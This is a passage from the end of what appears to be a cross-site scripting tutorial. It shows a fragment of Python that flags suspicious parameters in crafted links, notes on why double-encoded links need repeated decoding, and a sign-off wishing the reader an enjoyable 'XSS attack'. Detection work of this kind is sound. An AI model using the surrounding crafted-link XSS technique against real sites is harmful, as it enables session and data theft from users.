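    print("flagged in crafted link:", suspicious_params(link))
    print("flagged in the page's link:", suspicious_params(PAGE_LINK))
```

Repeated decoding is what makes the check useful against links that were encoded twice to look harmless, at the cost of occasionally over-decoding a legitimate value that genuinely contains a percent sign, so treat the result as a reason to look closer rather than as proof.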

Good Luck.
Enjoy the XSS attack...
